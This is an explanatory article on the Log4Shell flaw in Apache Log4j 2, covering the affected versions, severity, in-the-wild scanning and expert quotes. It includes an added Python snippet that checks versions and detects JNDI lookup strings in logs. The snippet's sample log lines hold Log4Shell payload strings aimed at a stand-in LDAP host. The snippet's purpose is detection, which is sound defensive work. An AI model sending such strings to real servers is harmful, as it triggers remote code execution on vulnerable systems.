Apache Log4j is a Java-based logging utility originally written by Ceki Gülcü. It is part of Apache Logging Services, a project of the Apache Software Foundation. The Apache Log4j team has created a successor to Log4j 1 with version number 2. Log4j 2 was developed with a focus on the problems of Log4j 1.2, 1.3, java.util.logging and Logback, and addresses issues that appeared in those frameworks.
On December 9, 2021, a zero-day arbitrary code execution vulnerability in Log4j 2 was reported and given the name “Log4Shell”. It has been characterized as the “Most Critical Vulnerability of the last decade”.
The Apache Software Foundation has issued patches to address a frequently exploited zero-day vulnerability in the Apache Log4j Java-based logging library, which could be used to execute malicious code and gain complete control of susceptible systems.
CVE-2021-44228, also known as Log4Shell or LogJam, is an instance of unauthenticated, remote code execution (RCE) on any application that uses the open-source software, and it affects Log4j 2.0-beta9 through 2.14.1. The bug received a perfect score of ten out of ten in the CVSS rating system, indicating the severity of the problem.
When message lookup substitution is enabled, an attacker with control over log messages or log message parameters can run arbitrary code loaded from LDAP servers, according to the Apache Foundation. “This behavior has been removed by default since Log4j 2.15.0.”
A single string of text can cause an application to contact a malicious external host if it is logged through the vulnerable instance of Log4j, essentially giving the adversary the ability to fetch a payload from a remote server and execute it locally. The flaw was discovered by Chen Zhaojun of Alibaba Cloud Security Team, according to the project maintainers.
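Two defender-side checks that follow from the description above, added here as an example and not code from the article or the Log4j project: deciding whether a reported Log4j 2 version falls in the affected range 2.0-beta9 through 2.14.1, and flagging log lines that carry a JNDI lookup string, as a WAF or SIEM rule would. The version ordering rules and the sample access-log lines are constructed for this example.

```python
# Added example (not from the article or the Log4j project).
import re
from typing import List, Tuple
from urllib.parse import unquote

# Pre-release tags sort before the final release: beta < rc < final.
_PRE_RANK = {"beta": 0, "rc": 1}
_FINAL_RANK = 2

def parse_version(v: str) -> Tuple[int, int, int, int, int]:
    """'2.0-beta9' -> (2, 0, 0, 0, 9); '2.14.1' -> (2, 14, 1, 2, 0).
    The 4th element ranks pre-release vs final so that
    2.0-beta9 < 2.0-rc1 < 2.0 < 2.0.1 compare correctly as tuples."""
    m = re.fullmatch(r"(\d+)\.(\d+)(?:\.(\d+))?(?:-(beta|rc)(\d+))?", v.strip())
    if not m:
        raise ValueError(f"unrecognised Log4j version: {v!r}")
    major, minor, patch = int(m[1]), int(m[2]), int(m[3] or 0)
    pre_rank = _PRE_RANK[m[4]] if m[4] else _FINAL_RANK
    pre_num = int(m[5]) if m[5] else 0
    return (major, minor, patch, pre_rank, pre_num)

FIRST_AFFECTED = parse_version("2.0-beta9")
LAST_AFFECTED = parse_version("2.14.1")   # 2.15.0 disables message lookups by default

def is_affected(version: str) -> bool:
    """True if this Log4j 2 release is inside the range named for CVE-2021-44228."""
    return FIRST_AFFECTED <= parse_version(version) <= LAST_AFFECTED

# Marker of the lookup that triggers JNDI substitution. Logged web fields are often
# URL-encoded (sometimes twice), so the line is decoded before matching.
_JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)

def has_jndi_lookup(line: str) -> bool:
    return bool(_JNDI_LOOKUP.search(unquote(unquote(line))))

# Constructed sample access-log lines: one benign, one with the lookup in the
# User-Agent, one with the same lookup URL-encoded in the query string.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:18:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [10/Dec/2021:18:01:03 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://example.invalid/a}"',
    '10.0.0.9 - - [10/Dec/2021:18:01:04 +0000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2Fexample.invalid%2Fb%7D HTTP/1.1" 404 0 "-" "curl/7.68.0"',
]

def flagged_lines(lines: List[str]) -> List[int]:
    """Indexes of lines that should be alerted on."""
    return [i for i, line in enumerate(lines) if has_jndi_lookup(line)]

if __name__ == "__main__":
    for v in ("2.0-beta8", "2.0-beta9", "2.14.1", "2.15.0"):
        print(f"{v}: {'affected' if is_affected(v) else 'not in affected range'}")
    print("flagged log lines:", flagged_lines(SAMPLE_LOG))
```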
Log4j is used as a logging package across a range of prominent technologies, including those of Amazon, Apple iCloud, Cisco, Cloudflare, ElasticSearch, Red Hat, Steam, Tesla, Twitter, and video games such as Minecraft. In the case of Minecraft, attackers have been able to achieve RCE on servers by simply pasting a carefully designed message into the chat box.
A huge attack surface
“The Apache Log4j zero-day vulnerability is probably the most critical vulnerability we have seen this year,” said Bharat Jogi, senior manager of vulnerabilities and signatures at Qualys. “Log4j is a ubiquitous library used by millions of Java applications for logging error messages. This vulnerability is trivial to exploit.”
Cybersecurity firms BitDefender, Cisco Talos, Huntress Labs, and Sonatype have all confirmed evidence of mass scanning of affected applications in the wild for vulnerable servers and attacks registered against their honeypot networks following the availability of a proof-of-concept (PoC) exploit. “This is a low-skilled attack that is extremely simple to execute,” Sonatype’s Ilkka Turunen said.
GreyNoise, likening the flaw to Shellshock, said it observed malicious activity targeting the vulnerability commencing on December 9, 2021. Web infrastructure company Cloudflare noted that it blocked roughly 20,000 exploit requests per minute around 6:00 p.m. UTC on Friday, with most of the exploitation attempts originating from Canada, the U.S., Netherlands, France, and the U.K.
Given the ease of exploitation and prevalence of Log4j in enterprise IT and DevOps, in-the-wild attacks aimed at susceptible servers are expected to ramp up in the coming days, making it imperative to address the flaw immediately. Israeli cybersecurity firm Cybereason has also released a fix called “Logout4Shell” that closes the shortcoming by using the vulnerability itself to reconfigure the logger and prevent further exploitation.
“This Log4j (CVE-2021-44228) vulnerability is extremely bad. Millions of applications use Log4j for logging, and all the attacker needs to do is get the app to log a special string,” security expert Marcus Hutchins said in a tweet.